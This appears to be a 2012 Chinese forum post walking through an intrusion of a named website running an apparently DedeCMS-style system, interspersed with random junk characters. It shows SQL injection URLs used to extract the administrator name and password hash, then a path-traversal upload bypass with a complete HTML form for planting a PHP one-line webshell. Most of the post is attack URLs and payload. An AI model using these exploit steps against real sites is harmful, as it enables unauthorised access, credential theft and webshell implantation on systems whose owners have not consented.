①注入漏洞。
( m: w3 ~4 n+ v3 A: U3 E1 ?这站 http://www.political-security.com/% I7 `# T6 ]; F, L
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间," M4 m6 i% x& o
www.political-security.com/data/mysql_error_trace.inc 爆后台+ |& r) v! X# D
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
. h! q8 T# c3 A7 t然后写上语句 / ^3 s6 P/ A& M F/ t
查看管理员帐号6 x5 }) f7 ~/ D4 Z/ G1 R. B
http://www.political-security.co ... &membergroup=@`
5 \* J( T' P" C
: T. n, ?2 o3 e/ \6 e( u( @: Padmin
6 R3 q. d7 V* v5 d# B R
; |+ u. t( t1 X/ F. ]3 Y3 [ Z查看管理员密码
3 P) \% G* g% Z, H8 ^% O http://www.political-security.co ... &membergroup=@`" G2 J& n2 M" p' w4 Y9 p/ @& k" ?! H
- |0 y% F2 ], z+ o4 E1 n8d29b1ef9f8c5a5af429$ Y; `, R& p7 h$ M! v9 d
. a" A2 h& q- h$ _/ R/ B
查看管理员密码
/ T5 w# D% m4 E# i0 M' h* R6 o2 u; O& u6 T5 ~& A/ j( h
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
, v3 v" T' d) Z* v: C9 u( @5 _ X; Q9 }9 K; n f& M( Z8 r& }
8d2
6 x! ` q6 L$ w/ K9b1ef9f8c5a5af42
( ]1 w( b; S& F* J* r/ d G9: O+ O8 ]! F2 _9 b
- ^0 L4 s* J1 s: B) u& y
cmd5没解出来 只好测试第二个方法6 }- |) B/ I! G9 D1 r
# ?0 Y+ E# D1 R1 v* j$ A
( a+ |* L. S) t* b1 j* ]! q* `
②上传漏洞:
/ z- G6 |: s' Y7 }2 [$ {4 l& F+ m S4 n$ N- S7 X
只要登陆会员中心,然后访问页面链接1 A8 L& h# ]0 U, y. `9 Z. n
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
" J8 l8 g' M- x' U$ t3 l2 o( V1 k) e3 J
* S8 X& Y# x! ^) M" v如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”# h ]4 T& M$ [/ y9 b% m) z
* Z+ I% }& k0 {; C
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm: b# E& A- |" I6 }' W( w
# X$ G1 c8 ]4 ^<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
M7 V2 D" |8 Y5 o- X5 A或者
* n& _+ n' Y/ Z/ R; e6 w4 f即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对